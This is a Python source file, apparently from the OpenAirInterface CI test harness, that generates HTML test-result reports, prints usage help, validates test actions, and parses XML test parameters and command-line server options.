self.htmlFile.write(' <meta name="viewport" content="width=device-width, initial-scale=1">\n')
self.htmlFile.write(' <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">\n')
self.htmlFile.write(' <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>\n')
self.htmlFile.write(' <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>\n')
self.htmlFile.write(' <title>Test Results for TEMPLATE_JOB_NAME job build #TEMPLATE_BUILD_ID</title>\n')
self.htmlFile.write('</head>\n')
self.htmlFile.write('<body><div class="container">\n')
self.htmlFile.write(' <br>\n')
self.htmlFile.write(' <table style="border-collapse: collapse; border: none;">\n')
self.htmlFile.write(' <tr style="border-collapse: collapse; border: none;">\n')
self.htmlFile.write(' <td style="border-collapse: collapse; border: none;">\n')
self.htmlFile.write(' <a href="http://www.openairinterface.org/">\n')
self.htmlFile.write(' <img src="http://www.openairinterface.org/wp-content/uploads/2016/03/cropped-oai_final_logo2.png" alt="" border="none" height=50 width=150>\n')
self.htmlFile.write(' </img>\n')
self.htmlFile.write(' </a>\n')
self.htmlFile.write(' </td>\n')
self.htmlFile.write(' <td style="border-collapse: collapse; border: none; vertical-align: center;">\n')
self.htmlFile.write(' <b><font size = "6">Job Summary -- Job: TEMPLATE_JOB_NAME -- Build-ID: TEMPLATE_BUILD_ID</font></b>\n')
self.htmlFile.write(' </td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
self.htmlFile.write(' <br>\n')
self.htmlFile.write(' <div class="alert alert-info"><strong> <span class="glyphicon glyphicon-dashboard"></span> TEMPLATE_STAGE_NAME</strong></div>\n')
self.htmlFile.write(' <table border = "1">\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-time"></span> Build Start Time (UTC) </td>\n')
self.htmlFile.write(' <td>TEMPLATE_BUILD_TIME</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-cloud-upload"></span> GIT Repository </td>\n')
self.htmlFile.write(' <td><a href="' + self.ranRepository + '">' + self.ranRepository + '</a></td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-wrench"></span> Job Trigger </td>\n')
if (self.ranAllowMerge):
self.htmlFile.write(' <td>Merge-Request</td>\n')
else:
self.htmlFile.write(' <td>Push to Branch</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
if (self.ranAllowMerge):
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-log-out"></span> Source Branch </td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-tree-deciduous"></span> Branch</td>\n')
self.htmlFile.write(' <td>' + self.ranBranch + '</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
if (self.ranAllowMerge):
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-tag"></span> Source Commit ID </td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-tag"></span> Commit ID </td>\n')
self.htmlFile.write(' <td>' + self.ranCommitID + '</td>\n')
self.htmlFile.write(' </tr>\n')
			if self.ranCommitID != '':
commit_message = subprocess.check_output("git log -n1 --pretty=format:\"%s\" " + self.ranCommitID, shell=True, universal_newlines=True)
commit_message = commit_message.strip()
self.htmlFile.write(' <tr>\n')
if (self.ranAllowMerge):
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-comment"></span> Source Commit Message </td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-comment"></span> Commit Message </td>\n')
self.htmlFile.write(' <td>' + commit_message + '</td>\n')
self.htmlFile.write(' </tr>\n')
if (self.ranAllowMerge):
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-log-in"></span> Target Branch </td>\n')
if (self.ranTargetBranch == ''):
self.htmlFile.write(' <td>develop</td>\n')
else:
self.htmlFile.write(' <td>' + self.ranTargetBranch + '</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
if (self.ADBIPAddress != 'none'):
terminate_ue_flag = True
self.GetAllUEDevices(terminate_ue_flag)
self.GetAllCatMDevices(terminate_ue_flag)
self.htmlUEConnected = len(self.UEDevices)
self.htmlFile.write(' <h2><span class="glyphicon glyphicon-phone"></span> <span class="glyphicon glyphicon-menu-right"></span> ' + str(len(self.UEDevices)) + ' UE(s) is(are) connected to ADB bench server</h2>\n')
self.htmlFile.write(' <h2><span class="glyphicon glyphicon-phone"></span> <span class="glyphicon glyphicon-menu-right"></span> ' + str(len(self.CatMDevices)) + ' CAT-M UE(s) is(are) connected to bench server</h2>\n')
else:
self.UEDevices.append('OAI-UE')
self.htmlUEConnected = len(self.UEDevices)
self.htmlFile.write(' <h2><span class="glyphicon glyphicon-phone"></span> <span class="glyphicon glyphicon-menu-right"></span> ' + str(len(self.UEDevices)) + ' OAI UE(s) is(are) connected to CI bench</h2>\n')
self.htmlFile.write(' <br>\n')
self.htmlFile.write(' <ul class="nav nav-pills">\n')
count = 0
while (count < self.nbTestXMLfiles):
pillMsg = ' <li><a data-toggle="pill" href="#'
pillMsg += self.htmlTabRefs[count]
pillMsg += '">'
pillMsg += '__STATE_' + self.htmlTabNames[count] + '__'
pillMsg += self.htmlTabNames[count]
pillMsg += ' <span class="glyphicon glyphicon-'
pillMsg += self.htmlTabIcons[count]
pillMsg += '"></span></a></li>\n'
self.htmlFile.write(pillMsg)
count += 1
self.htmlFile.write(' </ul>\n')
self.htmlFile.write(' <div class="tab-content">\n')
self.htmlFile.close()
def CreateHtmlTabHeader(self):
if (not self.htmlHeaderCreated):
if (not os.path.isfile('test_results.html')):
self.CreateHtmlHeader()
self.htmlFile = open('test_results.html', 'a')
if (self.nbTestXMLfiles == 1):
self.htmlFile.write(' <div id="' + self.htmlTabRefs[0] + '" class="tab-pane fade">\n')
self.htmlFile.write(' <h3>Test Summary for <span class="glyphicon glyphicon-file"></span> ' + self.testXMLfiles[0] + '</h3>\n')
else:
self.htmlFile.write(' <div id="build-tab" class="tab-pane fade">\n')
self.htmlFile.write(' <table class="table" border = "1">\n')
self.htmlFile.write(' <tr bgcolor = "#33CCFF" >\n')
self.htmlFile.write(' <th>Relative Time (ms)</th>\n')
self.htmlFile.write(' <th>Test Id</th>\n')
self.htmlFile.write(' <th>Test Desc</th>\n')
self.htmlFile.write(' <th>Test Options</th>\n')
self.htmlFile.write(' <th>Test Status</th>\n')
if (self.htmlUEConnected == -1):
terminate_ue_flag = True
if (self.ADBIPAddress != 'none'):
self.GetAllUEDevices(terminate_ue_flag)
self.GetAllCatMDevices(terminate_ue_flag)
else:
self.UEDevices.append('OAI-UE')
self.htmlUEConnected = len(self.UEDevices)
i = 0
while (i < self.htmlUEConnected):
self.htmlFile.write(' <th>UE' + str(i) + ' Status</th>\n')
i += 1
self.htmlFile.write(' </tr>\n')
self.htmlHeaderCreated = True
def CreateHtmlTabFooter(self, passStatus):
if ((not self.htmlFooterCreated) and (self.htmlHeaderCreated)):
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <th bgcolor = "#33CCFF" colspan=3>Final Tab Status</th>\n')
if passStatus:
self.htmlFile.write(' <th bgcolor = "green" colspan=' + str(2 + self.htmlUEConnected) + '><font color="white">PASS <span class="glyphicon glyphicon-ok"></span> </font></th>\n')
else:
self.htmlFile.write(' <th bgcolor = "red" colspan=' + str(2 + self.htmlUEConnected) + '><font color="white">FAIL <span class="glyphicon glyphicon-remove"></span> </font></th>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
self.htmlFile.write(' </div>\n')
self.htmlFile.close()
time.sleep(1)
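			# Patch the __STATE_<tab>__ placeholder written by CreateHtmlHeader: the marker is
			# simply removed on success, or replaced by a 'remove' glyph on failure.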
if passStatus:
cmd = "sed -i -e 's/__STATE_" + self.htmlTabNames[0] + "__//' test_results.html"
subprocess.run(cmd, shell=True)
else:
cmd = "sed -i -e 's/__STATE_" + self.htmlTabNames[0] + "__/<span class=\"glyphicon glyphicon-remove\"><\/span>/' test_results.html"
subprocess.run(cmd, shell=True)
self.htmlFooterCreated = False
def CreateHtmlFooter(self, passStatus):
if (os.path.isfile('test_results.html')):
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
logging.debug('\u001B[1m Creating HTML footer \u001B[0m')
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
self.htmlFile = open('test_results.html', 'a')
self.htmlFile.write('</div>\n')
self.htmlFile.write(' <p></p>\n')
self.htmlFile.write(' <table class="table table-condensed">\n')
machines = [ 'eNB', 'UE' ]
for machine in machines:
res = self.RetrieveSystemVersion(machine)
if res == -1:
continue
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <th colspan=8>' + str(machine) + ' Server Characteristics</th>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td>OS Version</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.OsVersion + '</span></td>\n')
self.htmlFile.write(' <td>Kernel Version</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.KernelVersion + '</span></td>\n')
self.htmlFile.write(' <td>UHD Version</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.UhdVersion + '</span></td>\n')
self.htmlFile.write(' <td>USRP Board</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.UsrpBoard + '</span></td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td>Nb CPUs</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.CpuNb + '</span></td>\n')
self.htmlFile.write(' <td>CPU Model Name</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.CpuModel + '</span></td>\n')
self.htmlFile.write(' <td>CPU Frequency</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.CpuMHz + '</span></td>\n')
self.htmlFile.write(' <td></td>\n')
self.htmlFile.write(' <td></td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <th colspan=5 bgcolor = "#33CCFF">Final Status</th>\n')
if passStatus:
self.htmlFile.write(' <th colspan=3 bgcolor="green"><font color="white">PASS <span class="glyphicon glyphicon-ok"></span></font></th>\n')
else:
self.htmlFile.write(' <th colspan=3 bgcolor="red"><font color="white">FAIL <span class="glyphicon glyphicon-remove"></span> </font></th>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
self.htmlFile.write(' <p></p>\n')
self.htmlFile.write(' <div class="well well-lg">End of Test Report -- Copyright <span class="glyphicon glyphicon-copyright-mark"></span> 2018 <a href="http://www.openairinterface.org/">OpenAirInterface</a>. All Rights Reserved.</div>\n')
self.htmlFile.write('</div></body>\n')
self.htmlFile.write('</html>\n')
self.htmlFile.close()
def CreateHtmlTestRow(self, options, status, processesStatus, machine='eNB'):
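		"""Append one result row to the current HTML tab, mapping KO process-status codes to readable causes and colouring the UE columns from any recorded eNB/UE failure message."""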
if ((not self.htmlFooterCreated) and (self.htmlHeaderCreated)):
currentTime = int(round(time.time() * 1000)) - self.startTime
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" >' + format(currentTime / 1000, '.1f') + '</td>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" >' + self.testCase_id + '</td>\n')
self.htmlFile.write(' <td>' + self.desc + '</td>\n')
self.htmlFile.write(' <td>' + str(options) + '</td>\n')
if (str(status) == 'OK'):
self.htmlFile.write(' <td bgcolor = "lightgreen" >' + str(status) + '</td>\n')
elif (str(status) == 'KO'):
if (processesStatus == 0):
self.htmlFile.write(' <td bgcolor = "lightcoral" >' + str(status) + '</td>\n')
elif (processesStatus == ENB_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - eNB process not found</td>\n')
elif (processesStatus == OAI_UE_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - OAI UE process not found</td>\n')
elif (processesStatus == ENB_PROCESS_SEG_FAULT):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - ' + machine + ' process ended in Segmentation Fault</td>\n')
elif (processesStatus == ENB_PROCESS_ASSERTION) or (processesStatus == OAI_UE_PROCESS_ASSERTION):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - ' + machine + ' process ended in Assertion</td>\n')
elif (processesStatus == ENB_PROCESS_REALTIME_ISSUE):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - ' + machine + ' process faced Real Time issue(s)</td>\n')
elif (processesStatus == ENB_PROCESS_NOLOGFILE_TO_ANALYZE) or (processesStatus == OAI_UE_PROCESS_NOLOGFILE_TO_ANALYZE):
self.htmlFile.write(' <td bgcolor = "orange" >OK?</td>\n')
elif (processesStatus == ENB_PROCESS_SLAVE_RRU_NOT_SYNCED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - ' + machine + ' Slave RRU could not synch</td>\n')
elif (processesStatus == OAI_UE_PROCESS_COULD_NOT_SYNC):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - UE could not sync</td>\n')
elif (processesStatus == HSS_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - HSS process not found</td>\n')
elif (processesStatus == MME_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - MME process not found</td>\n')
elif (processesStatus == SPGW_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - SPGW process not found</td>\n')
elif (processesStatus == UE_IP_ADDRESS_ISSUE):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - Could not retrieve UE IP address</td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcoral" >' + str(status) + '</td>\n')
else:
self.htmlFile.write(' <td bgcolor = "orange" >' + str(status) + '</td>\n')
if (len(str(self.htmleNBFailureMsg)) > 2):
cellBgColor = 'white'
result = re.search('ended with|faced real time issues', self.htmleNBFailureMsg)
if result is not None:
cellBgColor = 'red'
else:
result = re.search('showed|Reestablishment|Could not copy eNB logfile', self.htmleNBFailureMsg)
if result is not None:
cellBgColor = 'orange'
self.htmlFile.write(' <td bgcolor = "' + cellBgColor + '" colspan=' + str(self.htmlUEConnected) + '><pre style="background-color:' + cellBgColor + '">' + self.htmleNBFailureMsg + '</pre></td>\n')
self.htmleNBFailureMsg = ''
elif (len(str(self.htmlUEFailureMsg)) > 2):
cellBgColor = 'white'
result = re.search('ended with|faced real time issues', self.htmlUEFailureMsg)
if result is not None:
cellBgColor = 'red'
else:
result = re.search('showed|Could not copy UE logfile|oaitun_ue1 interface is either NOT mounted or NOT configured', self.htmlUEFailureMsg)
if result is not None:
cellBgColor = 'orange'
self.htmlFile.write(' <td bgcolor = "' + cellBgColor + '" colspan=' + str(self.htmlUEConnected) + '><pre style="background-color:' + cellBgColor + '">' + self.htmlUEFailureMsg + '</pre></td>\n')
self.htmlUEFailureMsg = ''
else:
i = 0
while (i < self.htmlUEConnected):
self.htmlFile.write(' <td>-</td>\n')
i += 1
self.htmlFile.write(' </tr>\n')
def CreateHtmlTestRowQueue(self, options, status, ue_status, ue_queue):
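		"""Same as CreateHtmlTestRow, but the per-UE columns are filled from messages queued by the UE worker processes."""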
if ((not self.htmlFooterCreated) and (self.htmlHeaderCreated)):
currentTime = int(round(time.time() * 1000)) - self.startTime
addOrangeBK = False
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" >' + format(currentTime / 1000, '.1f') + '</td>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" >' + self.testCase_id + '</td>\n')
self.htmlFile.write(' <td>' + self.desc + '</td>\n')
self.htmlFile.write(' <td>' + str(options) + '</td>\n')
if (str(status) == 'OK'):
self.htmlFile.write(' <td bgcolor = "lightgreen" >' + str(status) + '</td>\n')
elif (str(status) == 'KO'):
self.htmlFile.write(' <td bgcolor = "lightcoral" >' + str(status) + '</td>\n')
else:
addOrangeBK = True
self.htmlFile.write(' <td bgcolor = "orange" >' + str(status) + '</td>\n')
i = 0
while (i < self.htmlUEConnected):
if (i < ue_status):
if (not ue_queue.empty()):
if (addOrangeBK):
self.htmlFile.write(' <td bgcolor = "orange" >' + str(ue_queue.get()).replace('white', 'orange') + '</td>\n')
else:
self.htmlFile.write(' <td>' + str(ue_queue.get()) + '</td>\n')
else:
self.htmlFile.write(' <td>-</td>\n')
else:
self.htmlFile.write(' <td>-</td>\n')
i += 1
self.htmlFile.write(' </tr>\n')
#-----------------------------------------------------------
# ShowTestID()
#-----------------------------------------------------------
def ShowTestID(self):
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
logging.debug('\u001B[1mTest ID:' + self.testCase_id + '\u001B[0m')
logging.debug('\u001B[1m' + self.desc + '\u001B[0m')
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
#-----------------------------------------------------------
# Usage()
#-----------------------------------------------------------
def Usage():
print('----------------------------------------------------------------------------------------------------------------------')
print('main.py Ver:' + Version)
print('----------------------------------------------------------------------------------------------------------------------')
print('Usage: python main.py [options]')
print(' --help Show this help.')
print(' --mode=[Mode]')
print(' TesteNB')
print(' InitiateHtml, FinalizeHtml')
print(' TerminateeNB, TerminateUE, TerminateHSS, TerminateMME, TerminateSPGW')
print(' LogCollectBuild, LogCollecteNB, LogCollectHSS, LogCollectMME, LogCollectSPGW, LogCollectPing, LogCollectIperf')
print('---------------------------------------------------------------------------------------------------- Git Options --')
print(' --ranRepository=[OAI RAN Repository URL]')
print(' --ranBranch=[OAI RAN Repository Branch]')
print(' --ranCommitID=[OAI RAN Repository Commit SHA-1]')
print(' --ranAllowMerge=[Allow Merge Request (with target branch) (true or false)]')
print(' --ranTargetBranch=[Target Branch in case of a Merge Request]')
print('--------------------------------------------------------------------------------------------- eNB Server Options --')
print(' --eNBIPAddress=[eNB\'s IP Address]')
print(' --eNBUserName=[eNB\'s Login User Name]')
print(' --eNBPassword=[eNB\'s Login Password]')
print(' --eNBSourceCodePath=[eNB\'s Source Code Path]')
print('------------------------------------------------------------------------------------------ OAI UE Server Options --')
print(' --UEIPAddress=[UE\'s IP Address]')
print(' --UEUserName=[UE\'s Login User Name]')
print(' --UEPassword=[UE\'s Login Password]')
print(' --UESourceCodePath=[UE\'s Source Code Path]')
print('--------------------------------------------------------------------------------------------- EPC Server Options --')
print(' --EPCIPAddress=[EPC\'s IP Address]')
print(' --EPCUserName=[EPC\'s Login User Name]')
print(' --EPCPassword=[EPC\'s Login Password]')
print(' --EPCSourceCodePath=[EPC\'s Source Code Path]')
print(' --EPCType=[EPC\'s Type: OAI or ltebox or OAI-Rel14-CUPS]')
	print('--------------------------------------------------------------------------------------------- ADB Server Options --')
print(' --ADBIPAddress=[ADB\'s IP Address]')
print(' --ADBUserName=[ADB\'s Login User Name]')
print(' --ADBPassword=[ADB\'s Login Password]')
print('----------------------------------------------------------------------------------------------------------------------')
print(' --XMLTestFile=[XML Test File to be run]')
print('----------------------------------------------------------------------------------------------------------------------')
def CheckClassValidity(action,id):
	valid_actions = ['Build_eNB', 'WaitEndBuild_eNB', 'Initialize_eNB', 'Terminate_eNB',
		'Initialize_UE', 'Terminate_UE', 'Attach_UE', 'Detach_UE',
		'Build_OAI_UE', 'Initialize_OAI_UE', 'Terminate_OAI_UE',
		'DataDisable_UE', 'DataEnable_UE', 'CheckStatusUE',
		'Ping', 'Iperf', 'Reboot_UE',
		'Initialize_FlexranCtrl', 'Terminate_FlexranCtrl',
		'Initialize_HSS', 'Terminate_HSS', 'Initialize_MME', 'Terminate_MME',
		'Initialize_SPGW', 'Terminate_SPGW',
		'Initialize_CatM_module', 'Terminate_CatM_module', 'Attach_CatM_module', 'Detach_CatM_module', 'Ping_CatM_module',
		'IdleSleep', 'Perform_X2_Handover']
	if action not in valid_actions:
		logging.debug('ERROR: test-case ' + id + ' has wrong class ' + action)
		return False
	return True
def GetParametersFromXML(action):
if action == 'Build_eNB':
SSH.Build_eNB_args = test.findtext('Build_eNB_args')
SSH.eNB_instance = test.findtext('eNB_instance')
if (SSH.eNB_instance is None):
SSH.eNB_instance = '0'
SSH.eNB_serverId = test.findtext('eNB_serverId')
if (SSH.eNB_serverId is None):
SSH.eNB_serverId = '0'
xmlBgBuildField = test.findtext('backgroundBuild')
if (xmlBgBuildField is None):
SSH.backgroundBuild = False
else:
if re.match('true', xmlBgBuildField, re.IGNORECASE):
SSH.backgroundBuild = True
else:
SSH.backgroundBuild = False
if action == 'WaitEndBuild_eNB':
SSH.Build_eNB_args = test.findtext('Build_eNB_args')
SSH.eNB_instance = test.findtext('eNB_instance')
if (SSH.eNB_instance is None):
SSH.eNB_instance = '0'
SSH.eNB_serverId = test.findtext('eNB_serverId')
if (SSH.eNB_serverId is None):
SSH.eNB_serverId = '0'
if action == 'Initialize_eNB':
SSH.Initialize_eNB_args = test.findtext('Initialize_eNB_args')
SSH.eNB_instance = test.findtext('eNB_instance')
if (SSH.eNB_instance is None):
SSH.eNB_instance = '0'
SSH.eNB_serverId = test.findtext('eNB_serverId')
if (SSH.eNB_serverId is None):
SSH.eNB_serverId = '0'
if action == 'Terminate_eNB':
SSH.eNB_instance = test.findtext('eNB_instance')
if (SSH.eNB_instance is None):
SSH.eNB_instance = '0'
SSH.eNB_serverId = test.findtext('eNB_serverId')
if (SSH.eNB_serverId is None):
SSH.eNB_serverId = '0'
if action == 'Attach_UE':
nbMaxUEtoAttach = test.findtext('nbMaxUEtoAttach')
if (nbMaxUEtoAttach is None):
SSH.nbMaxUEtoAttach = -1
else:
SSH.nbMaxUEtoAttach = int(nbMaxUEtoAttach)
if action == 'CheckStatusUE':
expectedNBUE = test.findtext('expectedNbOfConnectedUEs')
if (expectedNBUE is None):
SSH.expectedNbOfConnectedUEs = -1
else:
SSH.expectedNbOfConnectedUEs = int(expectedNBUE)
if action == 'Build_OAI_UE':
SSH.Build_OAI_UE_args = test.findtext('Build_OAI_UE_args')
if action == 'Initialize_OAI_UE':
SSH.Initialize_OAI_UE_args = test.findtext('Initialize_OAI_UE_args')
SSH.UE_instance = test.findtext('UE_instance')
if (SSH.UE_instance is None):
SSH.UE_instance = '0'
if action == 'Terminate_OAI_UE':
		SSH.UE_instance = test.findtext('UE_instance')
if (SSH.UE_instance is None):
SSH.UE_instance = '0'
if action == 'Ping' or action == 'Ping_CatM_module':
SSH.ping_args = test.findtext('ping_args')
SSH.ping_packetloss_threshold = test.findtext('ping_packetloss_threshold')
if action == 'Iperf':
SSH.iperf_args = test.findtext('iperf_args')
SSH.iperf_packetloss_threshold = test.findtext('iperf_packetloss_threshold')
SSH.iperf_profile = test.findtext('iperf_profile')
if (SSH.iperf_profile is None):
SSH.iperf_profile = 'balanced'
else:
if SSH.iperf_profile != 'balanced' and SSH.iperf_profile != 'unbalanced' and SSH.iperf_profile != 'single-ue':
logging.debug('ERROR: test-case has wrong profile ' + SSH.iperf_profile)
SSH.iperf_profile = 'balanced'
SSH.iperf_options = test.findtext('iperf_options')
if (SSH.iperf_options is None):
SSH.iperf_options = 'check'
else:
if SSH.iperf_options != 'check' and SSH.iperf_options != 'sink':
logging.debug('ERROR: test-case has wrong option ' + SSH.iperf_options)
SSH.iperf_options = 'check'
if action == 'IdleSleep':
string_field = test.findtext('idle_sleep_time_in_sec')
if (string_field is None):
SSH.idle_sleep_time = 5
else:
SSH.idle_sleep_time = int(string_field)
if action == 'Perform_X2_Handover':
string_field = test.findtext('x2_ho_options')
if (string_field is None):
SSH.x2_ho_options = 'network'
else:
if string_field != 'network':
logging.error('ERROR: test-case has wrong option ' + string_field)
SSH.x2_ho_options = 'network'
else:
SSH.x2_ho_options = string_field
#check if given test is in list
#it is in list if one of the strings in 'list' is at the beginning of 'test'
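# e.g. an entry '0302+' (the '+' is stripped) matches every test id starting with '0302'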
def test_in_list(test, test_list):
	for check in test_list:
		check = check.replace('+','')
		if (test.startswith(check)):
			return True
	return False
def receive_signal(signum, frame):
sys.exit(1)
#-----------------------------------------------------------
# Parameter Check
#-----------------------------------------------------------
mode = ''
SSH = SSHConnection()
argvs = sys.argv
argc = len(argvs)
cwd = os.getcwd()
while len(argvs) > 1:
myArgv = argvs.pop(1) # 0th is this file's name
if re.match('^\-\-help$', myArgv, re.IGNORECASE):
Usage()
sys.exit(0)
elif re.match('^\-\-mode=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-mode=(.+)$', myArgv, re.IGNORECASE)
mode = matchReg.group(1)
elif re.match('^\-\-eNBRepository=(.+)$|^\-\-ranRepository(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBRepository=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBRepository=(.+)$', myArgv, re.IGNORECASE)
else:
matchReg = re.match('^\-\-ranRepository=(.+)$', myArgv, re.IGNORECASE)
SSH.ranRepository = matchReg.group(1)
elif re.match('^\-\-eNB_AllowMerge=(.+)$|^\-\-ranAllowMerge=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNB_AllowMerge=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB_AllowMerge=(.+)$', myArgv, re.IGNORECASE)
else:
matchReg = re.match('^\-\-ranAllowMerge=(.+)$', myArgv, re.IGNORECASE)
doMerge = matchReg.group(1)
if ((doMerge == 'true') or (doMerge == 'True')):
SSH.ranAllowMerge = True
elif re.match('^\-\-eNBBranch=(.+)$|^\-\-ranBranch=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBBranch=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBBranch=(.+)$', myArgv, re.IGNORECASE)
else:
matchReg = re.match('^\-\-ranBranch=(.+)$', myArgv, re.IGNORECASE)
SSH.ranBranch = matchReg.group(1)
elif re.match('^\-\-eNBCommitID=(.*)$|^\-\-ranCommitID=(.*)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBCommitID=(.*)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBCommitID=(.*)$', myArgv, re.IGNORECASE)
else:
matchReg = re.match('^\-\-ranCommitID=(.*)$', myArgv, re.IGNORECASE)
SSH.ranCommitID = matchReg.group(1)
elif re.match('^\-\-eNBTargetBranch=(.*)$|^\-\-ranTargetBranch=(.*)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBTargetBranch=(.*)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBTargetBranch=(.*)$', myArgv, re.IGNORECASE)
else:
matchReg = re.match('^\-\-ranTargetBranch=(.*)$', myArgv, re.IGNORECASE)
SSH.ranTargetBranch = matchReg.group(1)
elif re.match('^\-\-eNBIPAddress=(.+)$|^\-\-eNB[1-2]IPAddress=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBIPAddress = matchReg.group(1)
elif re.match('^\-\-eNB1IPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB1IPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB1IPAddress = matchReg.group(1)
elif re.match('^\-\-eNB2IPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB2IPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB2IPAddress = matchReg.group(1)
elif re.match('^\-\-eNBUserName=(.+)$|^\-\-eNB[1-2]UserName=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBUserName = matchReg.group(1)
elif re.match('^\-\-eNB1UserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB1UserName=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB1UserName = matchReg.group(1)
elif re.match('^\-\-eNB2UserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB2UserName=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB2UserName = matchReg.group(1)
elif re.match('^\-\-eNBPassword=(.+)$|^\-\-eNB[1-2]Password=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBPassword = matchReg.group(1)
elif re.match('^\-\-eNB1Password=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB1Password=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB1Password = matchReg.group(1)
elif re.match('^\-\-eNB2Password=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB2Password=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB2Password = matchReg.group(1)
elif re.match('^\-\-eNBSourceCodePath=(.+)$|^\-\-eNB[1-2]SourceCodePath=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBSourceCodePath=(.+)$', myArgv, re.IGNORECASE):
